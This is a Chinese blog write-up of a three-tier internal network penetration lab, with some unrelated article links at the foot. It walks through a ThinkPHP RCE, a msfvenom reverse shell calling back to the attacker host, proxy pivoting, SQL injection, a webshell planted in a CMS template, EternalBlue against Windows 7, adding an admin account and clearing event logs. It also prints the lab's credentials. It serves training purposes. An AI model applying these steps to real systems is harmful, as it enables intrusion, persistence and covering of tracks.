CFS三层内网靶机渗透

news2024/11/23 12:43:48

目录

一、靶场框架

靶场搭建:

二、渗透过程

三、总结

靶场介绍:

三层内网靶场,共有三个网段,分别为75网段(公网网段)、22网段(内网)、33网段(内网)

靶场由三台服务器构成分别为Target1、Target2、Target3,其系统分别是centos、Ubuntu、Windows7。Target1搭载VMnet4和NAT网卡、Target2搭载VMnet9和VMnet10网卡、Target3仅搭载VMnet10网卡。

通过搭建三层内网靶场,来模拟生产环境中外网服务器、内网服务器以及内网办公环境间的关系。

使用搭载了VMnet4网卡的kali模拟攻击者从外网信息收集,得到网站信息,利用网站漏洞夺取外网服务器权限,又将失陷的外网服务器作为跳板机,通过代理的方式访问到了内网服务器,然后通过内网服务器网站的漏洞,再一次夺取权限并建立二次代理以后,到达内网办公环境,最后利用主机所存在的漏洞,获得内网主机权限的渗透流程。

关于代理方面,可以用msf自带的代理工具也可以用一些其他的,万变不离其宗,下一篇文章会讲述EarthWorm代理工具的使用,实测,该工具相对于msf自带的工具较为稳定,不会在扫描的时候把主机扫挂了!

靶场框架:

借图一用,懒得去画了,这边更改一下ip地址

kali:192.168.75.44

target1:192.168.75.132

               192.168.22.130

target2:192.168.22.131

               192.168.33.130

target3:192.168.33.131

靶场搭建:

靶机在最初配置的时候要开启web服务:

centos:
root密码:teamssix.com

宝塔后台登陆地址及密码:
地址:http://target1ip:8888/a768f109/
账号:eaj3yhsl
密码:41bb8fee

在站点配置中,将target1ip填入其中

ubuntu:
root密码:teamssix.com

宝塔后台登陆地址及密码:
地址:http://target2ip:8888/2cc52ec0/
账号:xdynr37d
密码:123qwe..

windows 7:
Administrator密码:teamssix.com
此主机的IP地址:

192.168.33.131

这边看一下虚拟机网段的设置,添加3个网络,vm4/vm9/vm10,网段如下 

Kali攻击机的网段进行设置:

Target1的网段进行设置:

Target2的网段进行设置:

Target3的网段进行设置:

查看kali网段,设置无误,111是nat网段,出网用的

 查看Target1网段,设置无误,75是公网网段,22是内网网段

  查看Target2网段,设置无误,22是内网网段,33是另一个内网网段

 查看Target3网段,设置无误,33是内网网段

接下来配置一下Target1的web端服务

将Target的ip添加进去,即可完成

 Target2的web服务一样!

到此,所有靶机的配置就完成了,下面开始进行渗透!

渗透过程:

kali查看靶机ip地址,192.168.75.132

 对其进行端口扫描,发现21、22、80、888、3306、8888端口

 21、22都可暴力破解,可以自己去尝试!这边访问80端口,发现框架是ThinkPHP V5,版本是5.0这个版本是存在RCE漏洞的,等会用个小工具进行一波检测!

 先进行一波目录爆破,看看有没有什么敏感文件,这里扫出个robots.txt

 访问,发现flag1

 flag{QeaRqaw12fs}

利用这个ThinkPHP的小工具检测一下是否有相关的漏洞,发现确实存在RCE。

选择对应的版本GetShell

 用中国蚁剑连接,发现了flag2

 flag{e2D3aFdasde}

将shell返回给msf,生成一个远控,反向的!反向的意思是,我这边开个端口,让受害者,运行我们的远控后,主动连接我这边开的端口。后面还有正向操作。

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.75.44 lport=4455 -f elf>xiao.elf

 生成好了,在蚁剑里上传文件后并将其赋权

kali本地开启msf,设置监听和payload,以及刚才远控中设置的端口,ip等

设置好了之后,执行,即可连接到kali,获取meterpreter!

 

然后执行建立shell,运行相关命令查看当前拿下的靶机的ip,发现了是双网卡,另一个是22网段 

也可以在meterpreter中使用run get_local_subnets获取网段

并将该网段添加到路由中

 使用msf的Auxiliary辅助探测模块,设置代理,设置端口等

在本地修改代理的端口等vim /etc/proxychains4.conf

 

 然后就可以利用代理在本地去扫描22网段的主机端口了!

 这边发现了22网段也有很多端口开放,用curl访问80端口,回弹了它的源代码

并且发现了提示!这个路径下有sql注入! 

首先想要访问22端口的web服务,得现在浏览器里设置代理,将那会在本地设置的代理,填写到下方,并确定,之后就可以访问了。

 是一个BageCMS框架

对其目录爆破,查看敏感文件,发现robots.txt

访问后看到了两个路径!

输入url,找到了后台,不知登录和密码,那会说有个路径存在sql注入,那么就直接利用sql注入将用户名和密码爆出来!

 这边可以手注,更稳定一些,利用那个代理,有可能会扫挂了,又得重新整,比较稳定的就是用ew进行代理,后一篇去讲,其实我这里就是用的ew挂代理,sqlmap才用的如此丝滑!

 注出来了数据库名,下面就是日常操作,就不细写了

 

 

 

 

 

最后得到了用户名admin和密码123qwe

 登录后得到了第三个flag!

 浏览了一圈发现这个模板里可以修改php文件,那就直接写上一句话,获取webshell

 

 同时,蚁剑也要设置好代理,就可以连接到了

 关于这个路径,很简单,观察一下它的构造,r=是在访问模块,那这边直接访问tag,就直接访问到index.php了

连接成功后,在蚁剑中发现了33网段,那就将webshell转至msf 

 同样的操作,但是这边需要进行正向操作了,正向使用的是bind_tcp

正向代理:说白了是在已控服务器开启监听端口,通过这个端口形成一个正向隧道,由代理主机去访问,代理主机去连接,注意,内网入口一般处于DMZ区域,有防火墙拦截,无法直接进入内网环境!

反向代理:就是由内网主机主动的连接代理机器,然后攻击机去连接代理,形成一种反向代理,例如用VPS监听本地端口,让已控的内网服务器去连接这个端口,形成隧道。

 这边做一个了解就好,同样,上传,赋权,执行

 使用proxychains4 msfconsole开启msf,之前的msf不可以关,还挂着呢,新开这个去获取target2的shell

 use exploit/multi/handler

 set payload linux/x64/meterpreter/bind_tcp

 set LPORT 6666

set RHOST 192.168.22.131

 同样的操作,在meterpreter获取网段,添加路由等等操作,直接上图!

 

 

 

 

 将新开的代理端口写入proxychains4中,然后再开一个新的msf,用来获取target3的shell

 首先,对第三个靶机进行扫描,发现了445,139那就永恒之蓝打一波

 先检测一下是否存在,设置好了

 发现可能存在,那就直接冲!

 经过exploit、payload的设置后,直接run

 

 好极了,获取了meterpreter,进行shell,出现乱码,输入chcp 65001修改他的编码格式,乱码修复了

 直接不用提权,就是system了,查看开放的端口,发现了3389,远程桌面连接,好极了!

 

 新建一个用户,并将其发到管理员组

 Windows端开启mstsc,输入用户名和密码还有ip地址,开启远程桌面

 

 

 好嘛,啥玩意都没得,算了,还是修改一下administrator的密码,重新连!

 

 OKK!

 flag就在桌面上,香香了!

 flag{2wAdK32Lsd}

总体的渗透就此结束,最后还可以在meterpreter中clearev清楚事件日志,嘿嘿,这就没得必要了

总结:

  1. 首先在信息收集的时候要逐步的清晰这个目标的网络拓扑
  2. 其次,要不断地思考目标之间的转换,利用拿下的目标当作跳板,不断地深入渗透
  3. 通过本次靶场,对于代理的理解逐步加深
  4. 总结回想整个渗透过程所踩过的坑,亲手去做,才能遇到问题,思考问题,解决问题,从而理解问题所在。例如,在获取meterpreter的时候存在无法反弹,session关闭,代理挂了等问题。
  5. 最后,保持好奇心,坚持去做!

需要渗透过程中的小工具,可以私信我!嘿嘿,助人为快乐之本!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/540621.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ChatGPT+ “剪映 or 百度AIGC” 快速生成短视频

🍏🍐🍊🍑🍒🍓🫐🥑🍋🍉🥝 ChatGPT快速生成短视频 文章目录 🍐1.ChatGPT 剪映🍏2.ChatGPT 百度AIGC平台&#x…

【ThinkPHP6系列学习-2】多应用模式配置

上一篇:【ThinkPHP6系列学习-1】下载并部署ThinkPHP6 这里写一写TP6下配置多应用。因为TP6和TP5有所差异,TP6默认是单应用模式(单模块),而我们实际项目中往往是多应用的(多个模块)&#xff0c…

1.Buffer_Overflow-2.Stack_Overflow / 写入字符串

这道题虽然简单 但是却给我了另一个解题的看法 我们先进行运行 我们看看保护 发现只有NX保护 反汇编看看 发现有shellcode 但是我们没有办法执行shellcode 因为v5 不会等于后面的 这里我原本没有想法 后面进行看看他的汇编 这里其实就很清楚了 .text:00000000004011BB …

( 动态规划) 674. 最长连续递增序列 / 718. 最长重复子数组——【Leetcode每日一题】

题目一&#xff08;贪心&#xff09; ❓674. 最长连续递增序列 难度&#xff1a;简单 给定一个未经排序的整数数组&#xff0c;找到最长且 连续递增的子序列&#xff0c;并返回该序列的长度。 连续递增的子序列 可以由两个下标 l 和 r&#xff08;l < r&#xff09;确定…

vcruntime140.dll如何修复?这个修复方法很简单,适合电脑小白

今天打开photoshop软件工作的时候&#xff0c;突然间就打不开&#xff0c;电脑报错由于找不到vcruntime140.dll&#xff0c;无法继续执行此代码&#xff0c;然后我就把photoshop卸载了&#xff0c;再重新安装&#xff0c;依然还是报错。这个可怎么办&#xff1f;vcruntime140.d…

CentOS 安装MongoDB 6.0

一、安装依赖 yum install libcurl openssl xz-libs 二、下载安装包 安装包下载地址https://www.mongodb.com/try/download/community这里我选择的是 选择RedHat / CentOS 7.0平台的原因是我的操作系统使用的是CentOS 7.0的&#xff0c;需要下载与操作系统匹配的安装包 三、…

ChatGPT插件权限给Plus用户放开了

大家好&#xff0c;我是章北海mlpy ChatGPT插件权限给Plus用户放开了 我稍微测试了俩&#xff0c;感觉还行&#xff0c;后续我会对一些热门插件深入测测&#xff0c;敬请期待。 官方对插件的介绍如下&#xff1a; 1、插件由非由OpenAI控制的第三方应用程序提供动力。在安装…

Spring Cloud Alibaba-Sentinel熔断降级

Sentinel: 轻量级的流量控制、熔断降级Java库&#xff0c; 分布式系统的流量防卫兵。 文章目录 一、Sentinel 是什么&#xff1f;二、安装Sentinel控制台三、Sentinel 实战3.1、准备工作3.2、流控规则快速失败Warm Up匀速排队 3.3、热点key限流3.4、降级规则3.5、系统规则 四、…

自定义组件3-behaviors

1、behaviors是小程序中用于实现组件间代码共享的特性&#xff0c;类似于Vue.js中的mixins 2、behaviors的工作方式 每个behaviors可以包含一组属性、数据、生命周期函数和方法。组件引用它时&#xff0c;它的数据和属性和方法会被 合并到组件中。 每个组件可以引用多个behav…

Python采集知某专栏文章保存成pdf

前言 嗨喽&#xff0c;大家好呀~这里是爱看美女的茜茜呐 环境使用: Python 3.8 Pycharm wkhtmltopdf 软件 文末名片获取 模块使用: requests >>> pip install requests 数据请求 parsel >>> pip install parsel 数据解析 re >>> 内置模块 不…

【年度最强超级Ai让你体验真正的人工智能】

年度最强超级Ai让你体验真正的人工智能&#xff08;破解版&#xff09; 登录就是永久会员&#xff08;先上链接&#xff0c;资源来源于网络&#xff0c;如有侵权&#xff0c;联系删除&#xff09; 网易邮箱&#xff1a; 23402001163163.com 我用蓝奏浏览器分享了[GPT-AI助手V1…

100 个 Go 错误以及如何避免:5~8

协议&#xff1a;CC BY-NC-SA 4.0 译者&#xff1a;飞龙 本文来自【OpenDocCN 饱和式翻译计划】&#xff0c;采用译后编辑&#xff08;MTPE&#xff09;流程来尽可能提升效率。 真相一旦入眼&#xff0c;你就再也无法视而不见。——《黑客帝国》 五、字符串 本章涵盖 理解GO中…

Oracle执行计划管理 - SPM

https://blog.51cto.com/lhrbest/3246884 目录 Oracle优化器辅助手段的发展 SPM需求背景 SPM重要构成 SQL计划基准捕获 如何创建SQL计划基准 如何查看SQL计划基准 SQL计划基准选择 执行计划的三个属性 如何选择SQL计划 SQL计划基准发展 SQL计划基准发展的三种选择 …

在外包干了三年,我废了……不吹不黑!

没错&#xff0c;我也干过外包&#xff0c;一干就是三年&#xff0c;三年后&#xff0c;我废了…… 虽说废的不是很彻底&#xff0c;但那三年我几乎是出差了三年、玩了三年、荒废了三年&#xff0c;那三年&#xff0c;我的技术能力几乎是零成长的。 说起这段三年的外包经历&a…

CTFShow-电子取证篇Writeup

CTFShow-电子取证篇Writeup 套的签到题&#xff1a;JiaJia-CP-1&#xff1a;JiaJia-CP-2&#xff1a;JiaJia-CP-3&#xff1a; CTFShow 平台&#xff1a;https://ctf.show/ 套的签到题&#xff1a; JiaJia-CP-1&#xff1a; 这是部分人熟知的刘佳佳同学的电脑&#xff0c;她…

JavaWeb-Servlet的学习

Servlet 简介 Servlet是JavaWeb最为核心的内容&#xff0c;它是Java提供的一门动态web资源开发技术。 使用Servlet就可以实现&#xff0c;根据不同的登录用户在页面上动态显示不同内容。 Servlet是JavaEE规范之一&#xff0c;其实就是一个接口&#xff0c;将来我们需要定义S…

SpringBoot 整合 ES 进行各种高级查询搜索

数据准备 因为本文都是数据的搜索&#xff0c;所以我们需要在我们的es服务器里先插入一些数据以供我们后面使用 esUserService public interface EsUserService extends ElasticsearchRepository<User, Integer> {}RestController public class EsController {Autowir…

HUSTOJ中添加初赛练习系统

文章目录 0. 基于hustoj二开的初赛练习系统&#xff0c;QQ4705852261. 主界面2. 练习界面3. 模拟考试界面4. 查看试卷回放5. 后台操作界面6. 后台试题分类-列表7.后台试题-列表8. 后台试题-添加9. 后台试卷结构-设置 0. 基于hustoj二开的初赛练习系统&#xff0c;QQ470585226 …

Requests请求库的使用

Request请求库 爬虫运行原理Requests请求库安装环境 Requests库的使用状态码网页内容 爬虫运行原理 首先回顾一下爬虫运作的基本原理&#xff08;下面是比较正式的书面语&#xff09;&#xff1a; 爬虫是一种自动化程序&#xff0c;用于从互联网上获取信息&#xff0c; 发起请…

蓝牙耳机啥牌子好?发烧友力荐五大超高性价比蓝牙耳机

预算有限的情况下&#xff0c;性价比是我们在购物时的主要衡量维度&#xff0c;挑选蓝牙耳机时也不例外&#xff0c;那么你知道哪些蓝牙耳机性价比最高吗&#xff1f;不懂的话可以看看老烧我整理的超高性价比蓝牙耳机推荐&#xff0c;了解蓝牙耳机啥牌子好。 一、JEET Air 2 蓝…